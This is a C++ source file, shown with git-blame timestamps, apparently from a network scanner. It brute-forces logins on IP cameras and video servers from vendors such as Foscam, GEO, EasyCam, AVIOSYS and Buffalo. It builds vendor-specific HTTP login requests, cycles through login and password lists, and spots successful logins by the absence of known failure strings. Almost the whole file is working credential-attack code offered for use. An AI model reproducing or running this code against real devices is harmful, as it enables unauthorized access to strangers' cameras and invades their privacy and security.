2015-03-13 14:27:21 +00:00
|
|
|
|
#include "STh.h"
|
2015-02-24 14:00:19 +00:00
|
|
|
|
#include "externData.h"
|
2015-03-22 00:43:15 +00:00
|
|
|
|
#include "BruteUtils.h"
|
2015-02-24 14:00:19 +00:00
|
|
|
|
|
|
|
|
|
int recvWT(
|
|
|
|
|
int Socket,
|
|
|
|
|
char *Buffer,
|
|
|
|
|
int Len,
|
|
|
|
|
long Timeout,
|
|
|
|
|
int *bTimedOut
|
|
|
|
|
){
|
|
|
|
|
fd_set ReadSet;
|
|
|
|
|
int n;
|
|
|
|
|
struct timeval Time;
|
|
|
|
|
|
|
|
|
|
FD_ZERO(&ReadSet);
|
|
|
|
|
FD_SET(Socket,&ReadSet);
|
|
|
|
|
Time.tv_sec = Timeout;
|
|
|
|
|
Time.tv_usec = 0;
|
2015-02-24 14:14:32 +00:00
|
|
|
|
*bTimedOut = false;
|
2015-02-24 14:00:19 +00:00
|
|
|
|
n = select(Socket+1,&ReadSet,NULL,NULL,&Time);
|
|
|
|
|
if (n > 0) { /* got some data */
|
|
|
|
|
return recv(Socket,Buffer,Len,0);
|
|
|
|
|
}
|
|
|
|
|
if (n == 0) { /* timeout */
|
2015-02-24 14:14:32 +00:00
|
|
|
|
*bTimedOut = true;
|
2015-02-24 14:00:19 +00:00
|
|
|
|
}
|
|
|
|
|
return(n) ; /* trouble */
|
|
|
|
|
}
|
2015-02-26 14:20:37 +00:00
|
|
|
|
|
2015-03-22 00:43:15 +00:00
|
|
|
|
int _webLoginSeq(char *request, char *login, char *pass, const char *ip, int port, int passCounter, char *type, std::vector<char*> negVector)
|
2015-02-24 14:00:19 +00:00
|
|
|
|
{
|
|
|
|
|
char recvBuff[256] = {0};
|
|
|
|
|
char recvBuff2[4096] = {0};
|
|
|
|
|
|
|
|
|
|
SOCKET sock;
|
|
|
|
|
sockaddr_in sockAddr;
|
|
|
|
|
int bTO;
|
|
|
|
|
sockAddr.sin_family = AF_INET;
|
|
|
|
|
sockAddr.sin_port = htons(port);
|
|
|
|
|
HOSTENT *host;
|
|
|
|
|
#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__)
|
|
|
|
|
if(inet_addr(ip) != INADDR_NONE) sockAddr.sin_addr.S_un.S_addr = inet_addr(ip);
|
|
|
|
|
else if(host=gethostbyname (ip)) ((unsigned long*) &sockAddr.sin_addr)[0] = ((unsigned long**)host->h_addr_list)[0][0];
|
2015-03-23 14:22:36 +00:00
|
|
|
|
else return -1;
|
2015-02-24 14:00:19 +00:00
|
|
|
|
#else
|
|
|
|
|
if(inet_addr(ip) != INADDR_NONE) sockAddr.sin_addr.s_addr = inet_addr(ip);
|
2015-02-27 13:55:35 +00:00
|
|
|
|
else if(host=gethostbyname(ip)) ((unsigned long*) &sockAddr.sin_addr)[0] = ((unsigned long**)host->h_addr_list)[0][0];
|
2015-03-23 14:22:36 +00:00
|
|
|
|
else return -1;
|
2015-02-24 14:00:19 +00:00
|
|
|
|
#endif
|
|
|
|
|
sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
|
|
|
|
|
int cCode = connect(sock, (sockaddr*)&sockAddr, sizeof(sockAddr));
|
|
|
|
|
int cErrCode = WSAGetLastError();
|
|
|
|
|
|
2015-02-27 17:40:12 +00:00
|
|
|
|
while(cErrCode == WSAENOTSOCK)
|
2015-02-24 14:00:19 +00:00
|
|
|
|
{
|
|
|
|
|
CSSOCKET(sock);
|
|
|
|
|
sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
|
|
|
|
|
cCode = connect(sock, (sockaddr*)&sockAddr, sizeof(sockAddr));
|
|
|
|
|
cErrCode = WSAGetLastError();
|
2015-02-27 13:55:35 +00:00
|
|
|
|
if(gDebugMode) stt->doEmitionDebugFoundData("[" + QString(type) + "][ENOTSOCK] [" + QString(ip) + ":" + QString::number(port) + "]");
|
2015-02-24 14:00:19 +00:00
|
|
|
|
};
|
|
|
|
|
|
|
|
|
|
if(cCode != SOCKET_ERROR)
|
2015-02-27 13:55:35 +00:00
|
|
|
|
{
|
2015-02-24 14:00:19 +00:00
|
|
|
|
Activity += strlen(request);
|
|
|
|
|
|
|
|
|
|
if(send(sock, request, strlen(request), 0) == SOCKET_ERROR)
|
|
|
|
|
{
|
|
|
|
|
stt->doEmitionRedFoundData("[" + QString(type) + "] Send error! [" + QString(ip) + "]");
|
|
|
|
|
CSSOCKET(sock);
|
|
|
|
|
return 0;
|
|
|
|
|
}
|
|
|
|
|
else
|
|
|
|
|
{
|
2015-03-10 20:09:05 +00:00
|
|
|
|
if(MapWidgetOpened) stt->doEmitionAddOutData(QString(request));
|
2015-02-24 14:00:19 +00:00
|
|
|
|
int x = 1;
|
|
|
|
|
int xx = 0;
|
|
|
|
|
ZeroMemory(recvBuff2, sizeof(recvBuff2));
|
|
|
|
|
while(xx < 3072)
|
|
|
|
|
{
|
|
|
|
|
ZeroMemory(recvBuff, sizeof(recvBuff));
|
|
|
|
|
x = recvWT(sock, recvBuff, sizeof(recvBuff), gTimeOut + 2, &bTO);
|
|
|
|
|
if(x <= 0) break;
|
|
|
|
|
strncat(recvBuff2, recvBuff, x);
|
|
|
|
|
xx += x;
|
|
|
|
|
Activity += x;
|
|
|
|
|
};
|
|
|
|
|
|
|
|
|
|
if(BALogSwitched) stt->doEmitionBAData("Checked " + QString(type) + ": " + QString(ip) + ":" + QString::number(port) + "; login/pass: "+ QString(login) + ":" + QString(pass) + "; - Progress: (" + QString::number((passCounter/(double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%)");
|
|
|
|
|
|
|
|
|
|
if(MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(recvBuff2));
|
|
|
|
|
|
|
|
|
|
if(strlen(recvBuff2) > 0) {
|
|
|
|
|
bool result = true;
|
|
|
|
|
for(int i = 0; i < negVector.size(); ++i)
|
|
|
|
|
{
|
|
|
|
|
if(strstri(recvBuff2, negVector[i]) != NULL)
|
|
|
|
|
{
|
|
|
|
|
result = false;
|
|
|
|
|
break;
|
|
|
|
|
};
|
|
|
|
|
};
|
|
|
|
|
|
|
|
|
|
if(result)
|
|
|
|
|
{
|
|
|
|
|
CSSOCKET(sock);
|
|
|
|
|
return 1;
|
|
|
|
|
};
|
|
|
|
|
}
|
|
|
|
|
};
|
|
|
|
|
};
|
|
|
|
|
|
|
|
|
|
CSSOCKET(sock);
|
|
|
|
|
return 0;
|
2015-02-26 14:20:37 +00:00
|
|
|
|
}
|
|
|
|
|
|
2015-03-22 00:43:15 +00:00
|
|
|
|
lopaStr _IPCameraBrute(const char *ip, int port, char *SPEC)
|
2015-02-24 14:00:19 +00:00
|
|
|
|
{
|
|
|
|
|
lopaStr lps;
|
|
|
|
|
ZeroMemory(lps.login, sizeof(lps.login));
|
|
|
|
|
ZeroMemory(lps.pass, sizeof(lps.pass));
|
|
|
|
|
ZeroMemory(lps.other, sizeof(lps.other));
|
|
|
|
|
char login[128] = {0};
|
|
|
|
|
char pass[128] = {0};
|
2015-03-16 14:29:34 +00:00
|
|
|
|
char request[1024] = {0};
|
2015-02-24 14:00:19 +00:00
|
|
|
|
int passCounter = 1;
|
|
|
|
|
|
|
|
|
|
std::vector<char*> negVector;
|
|
|
|
|
if(strcmp(SPEC, "IPC") == 0)
|
|
|
|
|
{
|
|
|
|
|
negVector.push_back("<UserGroup>Invalid</UserGroup>");
|
|
|
|
|
}
|
|
|
|
|
else if(strcmp(SPEC, "GEO") == 0)
|
|
|
|
|
{
|
|
|
|
|
negVector.push_back("Access denied");
|
|
|
|
|
negVector.push_back("ErrNoSuchUsr.htm");
|
|
|
|
|
}
|
|
|
|
|
else if(strcmp(SPEC, "EasyCam") == 0)
|
|
|
|
|
{
|
|
|
|
|
negVector.push_back("Set-Cookie: usrLevel=-1;path=/");
|
|
|
|
|
}
|
|
|
|
|
else if(strcmp(SPEC, "Foscam") == 0)
|
|
|
|
|
{
|
|
|
|
|
negVector.push_back("<result>0</result>");
|
|
|
|
|
negVector.push_back("<result>-1</result>");
|
|
|
|
|
negVector.push_back("<result>-2</result>");
|
|
|
|
|
negVector.push_back("<result>-3</result>");
|
|
|
|
|
negVector.push_back("<result>-4</result>");
|
|
|
|
|
negVector.push_back("<result>-5</result>");
|
|
|
|
|
negVector.push_back("<result>-6</result>");
|
|
|
|
|
negVector.push_back("<result>-7</result>");
|
|
|
|
|
}
|
|
|
|
|
else if(strcmp(SPEC, "AVIOSYS") == 0)
|
|
|
|
|
{
|
|
|
|
|
negVector.push_back("Password Error");
|
|
|
|
|
}
|
|
|
|
|
else if(strcmp(SPEC, "BUFFALO") == 0)
|
|
|
|
|
{
|
|
|
|
|
negVector.push_back("403 Forbidden");
|
|
|
|
|
}
|
|
|
|
|
else if(strcmp(SPEC, "DVS") == 0)
|
|
|
|
|
{
|
|
|
|
|
negVector.push_back("Non-Existed");
|
|
|
|
|
}
|
|
|
|
|
else if(strcmp(SPEC, "IPCAM") == 0)
|
|
|
|
|
{
|
|
|
|
|
negVector.push_back("var check=\"0\"");
|
|
|
|
|
negVector.push_back("var authLevel =\"0\";");
|
|
|
|
|
}
|
|
|
|
|
else if(strcmp(SPEC, "IEORFOREFOX") == 0)
|
|
|
|
|
{
|
|
|
|
|
negVector.push_back("AAA()");
|
|
|
|
|
negVector.push_back("РРјСЏ или пароль неверные!");
|
|
|
|
|
negVector.push_back("Возврат");
|
|
|
|
|
negVector.push_back("HTTP/1.0 302 Found");
|
2015-03-22 00:43:15 +00:00
|
|
|
|
negVector.push_back("is incorrect");
|
2015-02-24 14:00:19 +00:00
|
|
|
|
}
|
|
|
|
|
else
|
|
|
|
|
{
|
|
|
|
|
stt->doEmitionRedFoundData("[_IPCameraBrute] No \"SPEC\" specified!");
|
2015-03-16 14:29:34 +00:00
|
|
|
|
|
2015-02-24 14:00:19 +00:00
|
|
|
|
strcpy(lps.login, "UNKNOWN");
|
|
|
|
|
return lps;
|
|
|
|
|
};
|
|
|
|
|
|
|
|
|
|
for(int i = 0; i < MaxLogin; i++)
|
|
|
|
|
{
|
2015-03-23 08:39:37 +00:00
|
|
|
|
if(!globalScanFlag) break;
|
2015-02-24 14:00:19 +00:00
|
|
|
|
if(strcmp(loginLst[i], " ") == 0) continue;
|
|
|
|
|
ZeroMemory(login, sizeof(login));
|
|
|
|
|
strcpy(login, loginLst[i]);
|
|
|
|
|
for(int j = 0; j < MaxPass; j++)
|
|
|
|
|
{
|
2015-03-23 08:39:37 +00:00
|
|
|
|
if(!globalScanFlag) break;
|
2015-02-24 14:00:19 +00:00
|
|
|
|
if(strcmp(passLst[j], " ") == 0) continue;
|
|
|
|
|
|
|
|
|
|
ZeroMemory(pass, sizeof(pass));
|
|
|
|
|
strcpy(pass, passLst[j]);
|
|
|
|
|
|
|
|
|
|
ZeroMemory(request, sizeof(request));
|
|
|
|
|
if(strcmp(SPEC, "IPC") == 0)
|
|
|
|
|
{
|
2015-03-23 14:22:36 +00:00
|
|
|
|
sprintf(request, "GET /login.xml?user=%s&usr=%s&password=%s&pwd=%s HTTP/1.1\r\nHost: %s:%d\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n",
|
|
|
|
|
login, login, pass, pass, ip, port);
|
|
|
|
|
}
|
2015-02-24 14:00:19 +00:00
|
|
|
|
else if(strcmp(SPEC, "GEO") == 0)
|
|
|
|
|
{
|
2015-03-23 14:22:36 +00:00
|
|
|
|
sprintf(request, "GET /Login.cgi?username=%s&password=%s HTTP/1.1\r\nHost: %s:%d\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n",
|
|
|
|
|
login, pass, ip, port);
|
|
|
|
|
}
|
2015-02-24 14:00:19 +00:00
|
|
|
|
else if(strcmp(SPEC, "EasyCam") == 0)
|
|
|
|
|
{
|
2015-03-23 14:22:36 +00:00
|
|
|
|
sprintf(request, "GET /login.xml?user=%s&usr=%s&password=%s&pwd=%s HTTP/1.1\r\nHost: %s:%d\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n",
|
|
|
|
|
login, login, pass, pass, ip, port);
|
|
|
|
|
}
|
2015-02-24 14:00:19 +00:00
|
|
|
|
else if(strcmp(SPEC, "Foscam") == 0)
|
|
|
|
|
{
|
2015-03-23 14:22:36 +00:00
|
|
|
|
sprintf(request, "GET /cgi-bin/CGIProxy.fcgi?usr=%s&pwd=%s&cmd=logIn&usrName=%s&pwd=%s HTTP/1.1\r\nHost: %s:%d\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n",
|
|
|
|
|
login, pass, login, pass, ip, port);
|
|
|
|
|
}
|
2015-02-24 14:00:19 +00:00
|
|
|
|
else if(strcmp(SPEC, "AVIOSYS") == 0)
|
|
|
|
|
{
|
2015-03-23 14:22:36 +00:00
|
|
|
|
sprintf(request, "GET /check_user.html?UserName=%s&PassWord=%s HTTP/1.1\r\nHost: %s:%d\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n",
|
|
|
|
|
login, pass, ip, port);
|
|
|
|
|
}
|
2015-02-24 14:00:19 +00:00
|
|
|
|
else if(strcmp(SPEC, "BUFFALO") == 0)
|
2015-03-23 14:22:36 +00:00
|
|
|
|
{
|
|
|
|
|
int sz = strlen(login) + strlen(pass) + strlen("user=&password=");
|
|
|
|
|
|
|
|
|
|
sprintf(request, "POST /rpc/login HTTP/1.1\r\nHost: %s:%d\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: keep-alive\r\nContent-Length: %d\r\n\r\nuser=%s&password=%s",
|
|
|
|
|
ip, port, sz, login, pass);
|
|
|
|
|
|
2015-02-24 14:00:19 +00:00
|
|
|
|
}
|
|
|
|
|
else if(strcmp(SPEC, "DVS") == 0)
|
2015-03-23 14:22:36 +00:00
|
|
|
|
{
|
|
|
|
|
int sz = strlen(login) + strlen(pass) + strlen("langs=en&user=&password=&submit=+Login+");
|
|
|
|
|
|
|
|
|
|
sprintf(request, "POST /login HTTP/1.1\r\nHost: %s:%d\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: keep-alive\r\nContent-Length: %d\r\n\r\nlangs=en&user=%s&password=%s&submit=+Login+",
|
|
|
|
|
ip, port, sz, login, pass);
|
2015-02-24 14:00:19 +00:00
|
|
|
|
}
|
|
|
|
|
else if(strcmp(SPEC, "IPCAM") == 0)
|
2015-03-23 14:22:36 +00:00
|
|
|
|
{
|
|
|
|
|
sprintf(request, "GET /cgi-bin/hi3510/checkuser.cgi?&-name=%s&-passwd=%s&-time=1416767330831 HTTP/1.1\r\nHost: %s:%d\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n",
|
|
|
|
|
login, pass, ip, port);
|
2015-02-24 14:00:19 +00:00
|
|
|
|
}
|
|
|
|
|
else if(strcmp(SPEC, "IEORFOREFOX") == 0)
|
|
|
|
|
{
|
2015-03-23 14:22:36 +00:00
|
|
|
|
int sz = strlen(login) + strlen(pass) + strlen("username=&userpwd=");
|
|
|
|
|
|
|
|
|
|
sprintf(request, "POST /logincheck.rsp?type=1 HTTP/1.1\r\nHost: %s:%d\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: keep-alive\r\nContent-Length: %d\r\n\r\nusername=%s&userpwd=%s",
|
|
|
|
|
ip, port, sz, login, pass);
|
2015-02-24 14:00:19 +00:00
|
|
|
|
};
|
|
|
|
|
|
|
|
|
|
int res = _webLoginSeq(request, login, pass, ip, port, passCounter, SPEC, negVector);
|
|
|
|
|
|
|
|
|
|
if(res == 1)
|
2015-03-16 14:29:34 +00:00
|
|
|
|
{
|
2015-02-24 14:00:19 +00:00
|
|
|
|
strcpy(lps.login, loginLst[i]);
|
|
|
|
|
strcpy(lps.pass, passLst[j]);
|
|
|
|
|
return lps;
|
|
|
|
|
}
|
|
|
|
|
else if(res == -1)
|
2015-03-16 14:29:34 +00:00
|
|
|
|
{
|
2015-02-24 14:00:19 +00:00
|
|
|
|
strcpy(lps.login, "UNKNOWN");
|
|
|
|
|
return lps;
|
|
|
|
|
};
|
|
|
|
|
++passCounter;
|
|
|
|
|
};
|
2015-03-16 14:29:34 +00:00
|
|
|
|
};
|
|
|
|
|
|
2015-02-24 14:00:19 +00:00
|
|
|
|
strcpy(lps.login, "UNKNOWN");
|
|
|
|
|
return lps;
|
2015-02-26 14:20:37 +00:00
|
|
|
|
}
|
|
|
|
|
|
2015-03-22 00:43:15 +00:00
|
|
|
|
lopaStr _IPCameraBLobby(const char *ip, int port, char *SPEC)
|
2015-02-24 14:00:19 +00:00
|
|
|
|
{
|
|
|
|
|
while(BrutingThrds >= gMaxBrutingThreads) Sleep(1000);
|
|
|
|
|
|
2015-03-13 14:27:21 +00:00
|
|
|
|
BruteUtils::BConInc();
|
2015-02-24 14:00:19 +00:00
|
|
|
|
lopaStr res = _IPCameraBrute(ip, port, SPEC);
|
2015-03-13 14:27:21 +00:00
|
|
|
|
BruteUtils::BConDec();
|
2015-02-24 14:00:19 +00:00
|
|
|
|
|
|
|
|
|
return res;
|
2015-02-26 14:20:37 +00:00
|
|
|
|
}
|